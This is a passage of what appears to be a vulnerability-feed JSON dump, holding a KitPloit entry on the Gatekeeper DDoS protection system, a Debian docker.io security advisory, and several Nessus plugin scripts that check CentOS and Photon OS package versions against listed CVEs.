stdout. Once Gatekeeper is booted, all information is output to the Gatekeeper log. \n\n \n** How to build packages ** \n\n\nGatekeeper Debian packages can be built with the commands below. They are meant to be run from the repository root and assume the git submodules have been pulled, and that the build dependencies have been installed, as instructed above. Gatekeeper and the submodules will be automatically compiled during the package build process. \n \n \n $ tar --exclude-vcs -Jcvf ../gatekeeper_1.0.0.orig.tar.xz -C .. gatekeeper \n $ debuild -uc -us \n \n\nThe Gatekeeper package will be available in the parent directory. \n\n \n \n\n\n** [ Download Gatekeeper ](<https://github.com/AltraMayor/gatekeeper> \"Download Gatekeeper\" ) **\n", "edition": 1, "modified": "2021-02-27T11:30:04", "published": "2021-02-27T11:30:04", "id": "KITPLOIT:6668773637474143833", "href": "http://www.kitploit.com/2021/02/gatekeeper-first-open-source-ddos.html", "title": "Gatekeeper - First Open-Source DDoS Protection System", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2021-02-28T01:29:34", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21285", "CVE-2020-15257", "CVE-2021-21284", "CVE-2020-15157"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4865-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nFebruary 27, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : docker.io\nCVE ID : CVE-2020-15157 CVE-2020-15257 CVE-2021-21284 CVE-2021-21285\n\nMultiple security issues were discovered in Docker, a Linux container\nruntime, which could result in denial of service, an information leak\nor privilege escalation.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 18.09.1+dfsg1-7.1+deb10u3.\n\nWe recommend that you upgrade your docker.io packages.\n\nFor the detailed security status of docker.io please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/docker.io\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-02-27T18:36:59", "published": "2021-02-27T18:36:59", "id": "DEBIAN:DSA-4865-1:E637E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00046.html", "title": "[SECURITY] [DSA 4865-1] docker.io security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-02-28T01:28:40", "description": "The remote CentOS Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nCESA-2021:0655 advisory.\n\n - Mozilla: Content Security Policy violation report could have contained the destination of a redirect\n (CVE-2021-23968, CVE-2021-23969)\n\n - Mozilla: MediaError message property could have leaked information about cross-origin resources\n (CVE-2021-23973)\n\n - Mozilla: Memory safety bugs fixed in Firefox 86 and Firefox ESR 78.8 (CVE-2021-23978)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 1, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-27T00:00:00", "title": "CentOS 8 : firefox (CESA-2021:0655)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-23969", "CVE-2021-23978", "CVE-2021-23973", "CVE-2021-23968"], "modified": "2021-02-27T00:00:00", "cpe": ["cpe:/a:centos:centos:8::highavailability", "cpe:/o:centos:centos:8::baseos", "cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:firefox", "cpe:/a:centos:centos:8::nfv", "cpe:/a:centos:centos:8::powertools", "cpe:/a:centos:centos:8::appstream"], "id": "CENTOS8_RHSA-2021-0655.NASL", "href": "https://www.tenable.com/plugins/nessus/146870", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2021:0655. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146870);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\n \"CVE-2021-23968\",\n \"CVE-2021-23969\",\n \"CVE-2021-23973\",\n \"CVE-2021-23978\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0655\");\n\n script_name(english:\"CentOS 8 : firefox (CESA-2021:0655)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nCESA-2021:0655 advisory.\n\n - Mozilla: Content Security Policy violation report could have contained the destination of a redirect\n (CVE-2021-23968, CVE-2021-23969)\n\n - Mozilla: MediaError message property could have leaked information about cross-origin resources\n (CVE-2021-23973)\n\n - Mozilla: Memory safety bugs fixed in Firefox 86 and Firefox ESR 78.8 (CVE-2021-23978)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0655\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected firefox package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-23978\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::highavailability\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::nfv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::powertools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'firefox-78.8.0-1.el8_3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE},\n {'reference':'firefox-78.8.0-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'firefox');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-28T01:28:41", "description": "The remote CentOS Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nCESA-2021:0657 advisory.\n\n - Mozilla: Content Security Policy violation report could have contained the destination of a redirect\n (CVE-2021-23968, CVE-2021-23969)\n\n - Mozilla: MediaError message property could have leaked information about cross-origin resources\n (CVE-2021-23973)\n\n - Mozilla: Memory safety bugs fixed in Firefox 86 and Firefox ESR 78.8 (CVE-2021-23978)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 1, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-27T00:00:00", "title": "CentOS 8 : thunderbird (CESA-2021:0657)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-23969", "CVE-2021-23978", "CVE-2021-23973", "CVE-2021-23968"], "modified": "2021-02-27T00:00:00", "cpe": ["cpe:/a:centos:centos:8::highavailability", "p-cpe:/a:centos:centos:thunderbird", "cpe:/o:centos:centos:8::baseos", "cpe:/o:centos:centos:8", "cpe:/a:centos:centos:8::nfv", "cpe:/a:centos:centos:8::powertools", "cpe:/a:centos:centos:8::appstream"], "id": "CENTOS8_RHSA-2021-0657.NASL", "href": "https://www.tenable.com/plugins/nessus/146872", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2021:0657. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146872);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\n \"CVE-2021-23968\",\n \"CVE-2021-23969\",\n \"CVE-2021-23973\",\n \"CVE-2021-23978\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0657\");\n\n script_name(english:\"CentOS 8 : thunderbird (CESA-2021:0657)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nCESA-2021:0657 advisory.\n\n - Mozilla: Content Security Policy violation report could have contained the destination of a redirect\n (CVE-2021-23968, CVE-2021-23969)\n\n - Mozilla: MediaError message property could have leaked information about cross-origin resources\n (CVE-2021-23973)\n\n - Mozilla: Memory safety bugs fixed in Firefox 86 and Firefox ESR 78.8 (CVE-2021-23978)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0657\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected thunderbird package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-23978\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::highavailability\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::nfv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::powertools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'thunderbird-78.8.0-1.el8_3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE},\n {'reference':'thunderbird-78.8.0-1.el8_3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'thunderbird');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-28T01:12:48", "description": "An update of the openssl package has been released.", "edition": 1, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2021-02-27T00:00:00", "title": "Photon OS 3.0: Openssl PHSA-2021-3.0-0200", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-23839"], "modified": "2021-02-27T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:openssl", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2021-3_0-0200_OPENSSL.NASL", "href": "https://www.tenable.com/plugins/nessus/146873", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0200. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146873);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\"CVE-2021-23839\");\n\n script_name(english:\"Photon OS 3.0: Openssl PHSA-2021-3.0-0200\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the openssl package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-200.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-23839\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'openssl-1.0.2y-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'openssl-c_rehash-1.0.2y-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'openssl-devel-1.0.2y-1.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'openssl-perl-1.0.2y-1.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'openssl');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-28T01:12:47", "description": "An update of the salt package has been released.", "edition": 1, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2021-02-27T00:00:00", "title": "Photon OS 1.0: Salt PHSA-2021-1.0-0364", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-35662", "CVE-2021-25283", "CVE-2021-25284", "CVE-2021-3197", "CVE-2020-28972", "CVE-2021-3148", "CVE-2021-25281", "CVE-2021-25282", "CVE-2020-28243", "CVE-2021-3144"], "modified": "2021-02-27T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2021-1_0-0364_SALT.NASL", "href": "https://www.tenable.com/plugins/nessus/146878", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-1.0-0364. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146878);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\n \"CVE-2020-28243\",\n \"CVE-2020-28972\",\n \"CVE-2020-35662\",\n \"CVE-2021-25281\",\n \"CVE-2021-25282\",\n \"CVE-2021-25283\",\n \"CVE-2021-25284\",\n \"CVE-2021-3144\",\n \"CVE-2021-3148\",\n \"CVE-2021-3197\"\n );\n\n script_name(english:\"Photon OS 1.0: Salt PHSA-2021-1.0-0364\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-364.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3197\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 1.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-api-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-cloud-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-master-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-minion-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-proxy-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-spm-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-ssh-2019.2.4-2.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'salt-syndic-2019.2.4-2.ph1')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'salt');\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-02-28T01:12:48", "description": "An update of the binutils package has been released.", "edition": 1, "cvss3": {"score": 6.1, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"}, "published": "2021-02-27T00:00:00", "title": "Photon OS 2.0: Binutils PHSA-2021-2.0-0321", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-35507", "CVE-2020-35496", "CVE-2020-35494", "CVE-2020-35493", "CVE-2020-35495"], "modified": "2021-02-27T00:00:00", "cpe": ["cpe:/o:vmware:photonos:2.0", "p-cpe:/a:vmware:photonos:binutils"], "id": "PHOTONOS_PHSA-2021-2_0-0321_BINUTILS.NASL", "href": "https://www.tenable.com/plugins/nessus/146876", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-2.0-0321. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146876);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/27\");\n\n script_cve_id(\n \"CVE-2020-35493\",\n \"CVE-2020-35494\",\n \"CVE-2020-35495\",\n \"CVE-2020-35496\",\n \"CVE-2020-35507\"\n );\n\n script_name(english:\"Photon OS 2.0: Binutils PHSA-2021-2.0-0321\");\n\n script_set_attribute(attribute:\"synopsis\", 